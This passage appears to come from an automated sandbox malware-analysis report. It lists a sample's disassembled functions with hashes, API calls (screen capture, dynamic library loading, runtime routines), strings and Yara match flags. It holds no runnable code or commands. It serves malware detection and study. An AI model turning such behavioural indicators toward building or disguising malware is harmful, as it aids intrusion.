                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction ID: 70ade5293ce95a995033036da66bd690249c8a0141dd443be95812c5f6c87ab8
                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction Fuzzy Hash: 7381827230C0B34AEB29463E957843FFFE15A523A135A179FD4F2CA2C1EE18C694D624
                                                  Function 03037A7D Relevance: .2, Instructions: 232COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction ID: 616781a9f9b99fd5201fff2f4a6c546bd9e3d7a7f0a9f6d7c7215ffefb34657a
                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction Fuzzy Hash: 1F8146B220A0E349DBA9C63E857453EFFF95A439A131E0B9DD4F3CB5C1EE249154D620
                                                  Function 00428580 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 93e5daa5636be076332bd1d1c6ab8ee00e3655dcebceb5ec59e252ebbac9be67
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 69113B7730307153D6048A2DF8B45BF9795EBC53207ED426FD0418B749CE2AE9819508
                                                  Function 030387E7 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 42a5f730a30a1e1bd32152643fcb173ca3e37f5da6869ad4a1273d6a3801185d
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: FF11B27760704243D699CB3ED8B46BAE7DDEAC7220B2DC6FAF0414B658D322E24D9604
                                                  Function 02D29B4B Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D29000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d29000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction ID: 9e839b5f026795bf8b113b1b7de4ce0b000b579bcfdb3264783599d064fe13f9
                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction Fuzzy Hash: BF117C72340110AFDB44DE65DCE0FE673EAEB98264F298065ED08CB356D675EC42CB60
                                                  Function 03010D90 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction ID: 09cbd17cd191a2f6732b514d5ba89ddc17ef5fef794b0c0c12c8e7089248c805
                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction Fuzzy Hash: A501F272B026008FDF31CF24CC04BAA33E9EB86206F0940E4E94A97285E370A8818B80
                                                  Function 00402116 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402151
                                                  • GetClientRect.USER32(?,?), ref: 00402166
                                                  • GetDC.USER32(?), ref: 0040216D
                                                  • CreateSolidBrush.GDI32(00646464), ref: 00402180
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00402194
                                                  • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040219F
                                                  • SelectObject.GDI32(00000000,00000000), ref: 004021AD
                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021C0
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021CB
                                                  • MulDiv.KERNEL32(00000008,00000000), ref: 004021D4
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021F8
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00402206
                                                  • SetBkMode.GDI32(?,00000001), ref: 00402283
                                                  • SetTextColor.GDI32(?,00000000), ref: 00402292
                                                  • _wcslen.LIBCMT ref: 0040229B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                  • String ID: Tahoma
                                                  • API String ID: 3832963559-3580928618
                                                  • Opcode ID: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                  • Instruction ID: 010c8dd0ade12b0eef00d8562bcf10ebda5dfd6cd9d9fcac1ad08c501085cdf2
                                                  • Opcode Fuzzy Hash: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                  • Instruction Fuzzy Hash: E871FD72900228AFDB22DF64DD85FAEB7BCEB09B11F0041A5B609E6151DA74AF81CF14
                                                  Function 00402591 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?), ref: 004025ED
                                                  • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025FF
                                                  • ReleaseCapture.USER32 ref: 00402612
                                                  • GetDC.USER32(00000000), ref: 00402639
                                                  • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026C0
                                                  • CreateCompatibleDC.GDI32(?), ref: 004026C9
                                                  • SelectObject.GDI32(00000000,00000000), ref: 004026D3
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 00402701
                                                  • ShowWindow.USER32(?,00000000), ref: 0040270A
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040271C
                                                  • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402737
                                                  • DeleteFileW.KERNEL32(?), ref: 00402751
                                                  • DeleteDC.GDI32(00000000), ref: 00402758
                                                  • DeleteObject.GDI32(00000000), ref: 0040275F
                                                  • ReleaseDC.USER32(00000000,?), ref: 0040276D
                                                  • DestroyWindow.USER32(?), ref: 00402774
                                                  • SetCapture.USER32(?), ref: 004027C1
                                                  • GetDC.USER32(00000000), ref: 004027F5
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0040280B
                                                  • GetKeyState.USER32(0000001B), ref: 00402818
                                                  • DestroyWindow.USER32(?), ref: 0040282D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                  • String ID: gya
                                                  • API String ID: 2545303185-1989253062
                                                  • Opcode ID: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                  • Instruction ID: e71ef6788f7482d4de425a52166adb2a5dd74d508ff262b25753fab110ccc0fb
                                                  • Opcode Fuzzy Hash: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                  • Instruction Fuzzy Hash: 926181B5900209AFCB289F64ED48FAA7BB9FF49706F144179F605A22A2D774C941CF1C
                                                  Function 0042E6D2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: fec93888c3f7e73e0eb96cf8028c18e5ced2e8f3fd0cfc5e1e5440814fe90055
                                                  • Instruction ID: ea2a752c51db2b1f33c6fb20177c4d444c994d8588285db844449b2f99ea92ea
                                                  • Opcode Fuzzy Hash: fec93888c3f7e73e0eb96cf8028c18e5ced2e8f3fd0cfc5e1e5440814fe90055
                                                  • Instruction Fuzzy Hash: 7AB1C371A002159FDB11DF6AD841BEEB7F4FF18304F54452FE485AB342D77AA8418B14
                                                  Function 0303E939 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                  • Instruction ID: b86586dccb7aef11d25738584de1df32808ac29290684ebe86e2caf0b94ea22a
                                                  • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                  • Instruction Fuzzy Hash: 4BB1C0B69013059FDF51DF69C880BEEBBF8BF4A300F184569E455AB241DB75A941CB20
                                                  Function 03030C46 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 136threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 03030C56
                                                  • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 03030CBD
                                                  • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 03030CDA
                                                  • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 03030D40
                                                  • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 03030D55
                                                  • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 03030D67
                                                  • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 03030D95
                                                  • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 03030DA0
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03030DCC
                                                  • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 03030DDC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                  • String ID: 11@$%D
                                                  • API String ID: 3720063390-4114847594
                                                  • Opcode ID: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                  • Instruction ID: 076c2fffb58e95f2af65184caa7ec0e8279940cb29115aa5fd1fc061e1742d73
                                                  • Opcode Fuzzy Hash: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                  • Instruction Fuzzy Hash: EC41C434A033549BDF49FBA5C8547FD7BB9AF87300F1840A9D8465F292CB355A06C762
                                                  Function 0043A618 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0043A65C
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399C8
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399DA
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399EC
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399FE
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A10
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A22
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A34
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A46
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A58
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A6A
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A7C
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A8E
                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439AA0
                                                  • _free.LIBCMT ref: 0043A651
                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                  • _free.LIBCMT ref: 0043A673
                                                  • _free.LIBCMT ref: 0043A688
                                                  • _free.LIBCMT ref: 0043A693
                                                  • _free.LIBCMT ref: 0043A6B5
                                                  • _free.LIBCMT ref: 0043A6C8
                                                  • _free.LIBCMT ref: 0043A6D6
                                                  • _free.LIBCMT ref: 0043A6E1
                                                  • _free.LIBCMT ref: 0043A719
                                                  • _free.LIBCMT ref: 0043A720
                                                  • _free.LIBCMT ref: 0043A73D
                                                  • _free.LIBCMT ref: 0043A755
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                  • Instruction ID: 8150cfcbb8d97c1a634bb94bc0336974ffbd25353871f942fa72eec07d372a2d
                                                  • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                  • Instruction Fuzzy Hash: D4316E315002009EEB219B35D886B5B73E8FF58315F14A51FE4D9CA251DB7AED508B1A
                                                  Function 0304A87F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0304A8C3
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C2F
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C41
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C53
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C65
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C77
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C89
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C9B
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049CAD
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049CBF
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049CD1
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049CE3
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049CF5
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049D07
                                                  • _free.LIBCMT ref: 0304A8B8
                                                    • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?), ref: 03043707
                                                    • Part of subcall function 030436F1: GetLastError.KERNEL32(?,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?,?), ref: 03043719
                                                  • _free.LIBCMT ref: 0304A8DA
                                                  • _free.LIBCMT ref: 0304A8EF
                                                  • _free.LIBCMT ref: 0304A8FA
                                                  • _free.LIBCMT ref: 0304A91C
                                                  • _free.LIBCMT ref: 0304A92F
                                                  • _free.LIBCMT ref: 0304A93D
                                                  • _free.LIBCMT ref: 0304A948
                                                  • _free.LIBCMT ref: 0304A980
                                                  • _free.LIBCMT ref: 0304A987
                                                  • _free.LIBCMT ref: 0304A9A4
                                                  • _free.LIBCMT ref: 0304A9BC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                  • Instruction ID: b03988a2c345da1d1a2a6b3516da91575e4138540e66491af739945d3ecd4411
                                                  • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                  • Instruction Fuzzy Hash: 3331B3B56463069FDBA0EB38E841B96B3E8EF40390F198479E458CB250DF71EE60CB14
                                                  Function 00439AA9 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                  • Instruction ID: 14d391df4236cd99baad955409263e6980f1ff06ffe499d5f8ebd119726a11a8
                                                  • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                  • Instruction Fuzzy Hash: 16C14772D40205BBDB20DB98CC46FDEB7F8AB4C708F15515AFA04FB282D6B59E418B64
                                                  Function 0042486D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 104threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424886
                                                    • Part of subcall function 00424B55: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245B9), ref: 00424B65
                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042489B
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004248AA
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004248B8
                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042492E
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042496E
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042497C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                  • String ID: 11@$pContext$switchState
                                                  • API String ID: 3151764488-3851367110
                                                  • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                  • Instruction ID: b5099d2659ab5da3d856e1a370161b96529dd65552012442df5f2ab280934ec0
                                                  • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                  • Instruction Fuzzy Hash: 1331E575B002249BCF04EF65D881A6E77B5FF84314F60446BE915A7382DB78EE05C798
                                                  Function 0302EEE2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,0302F248,00000004,03027DA7,00000004,03028089), ref: 0302EF19
                                                  • GetLastError.KERNEL32(?,0302F248,00000004,03027DA7,00000004,03028089,?,030287B9,?,00000008,0302802D,00000000,?,?,00000000,?), ref: 0302EF25
                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0302F248,00000004,03027DA7,00000004,03028089,?,030287B9,?,00000008,0302802D,00000000,?,?,00000000), ref: 0302EF35
                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0302EF4B
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF61
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF78
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF8F
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EFA6
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EFBD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$ErrorLast
                                                  • String ID: advapi32.dll
                                                  • API String ID: 2340687224-4050573280
                                                  • Opcode ID: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                  • Instruction ID: c76f96488dd42acea5aeb1412ae93a8249c1392cd2279393adbb43d2f680315f
                                                  • Opcode Fuzzy Hash: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                  • Instruction Fuzzy Hash: 19217CB5905720BFD750AFB49C08AAABFECEF05B56F114A2AF141D7650CB7C8440CBA8
                                                  Function 0302EEE5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,0302F248,00000004,03027DA7,00000004,03028089), ref: 0302EF19
                                                  • GetLastError.KERNEL32(?,0302F248,00000004,03027DA7,00000004,03028089,?,030287B9,?,00000008,0302802D,00000000,?,?,00000000,?), ref: 0302EF25
                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0302F248,00000004,03027DA7,00000004,03028089,?,030287B9,?,00000008,0302802D,00000000,?,?,00000000), ref: 0302EF35
                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0302EF4B
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF61
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF78
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF8F
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EFA6
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EFBD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$ErrorLast
                                                  • String ID: advapi32.dll
                                                  • API String ID: 2340687224-4050573280
                                                  • Opcode ID: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                  • Instruction ID: 0f119c114cf7a57ca4392dd85cf56adc22267b9c96f4c05f98b5850593c1beca
                                                  • Opcode Fuzzy Hash: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                  • Instruction Fuzzy Hash: 002160B5905720BBD750AFB4DC08AAABFECEF05B56F114A2AF141D7650CB7C9440CBA8
                                                  Function 030224C7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0302672B), ref: 030224D6
                                                  • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 030224E4
                                                  • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 030224F2
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0302672B), ref: 03022520
                                                  • GetProcAddress.KERNEL32(00000000), ref: 03022527
                                                  • GetLastError.KERNEL32(?,?,?,0302672B), ref: 03022542
                                                  • GetLastError.KERNEL32(?,?,?,0302672B), ref: 0302254E
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 03022564
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03022572
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                  • String ID: kernel32.dll
                                                  • API String ID: 4179531150-1793498882
                                                  • Opcode ID: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                  • Instruction ID: 8c32455445fb8d732b2b87ca011359121f1c5b9a52471a738e7411a433b066b2
                                                  • Opcode Fuzzy Hash: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                  • Instruction Fuzzy Hash: 3211C2799023307FE750FFB4AC89ABBBEACAD41A127544926F401D6161EB78D540876C
                                                  Function 0043EEC2 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004401AF), ref: 0043EEE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: 11@$acos$asin$exp$log$log10$pow$sqrt
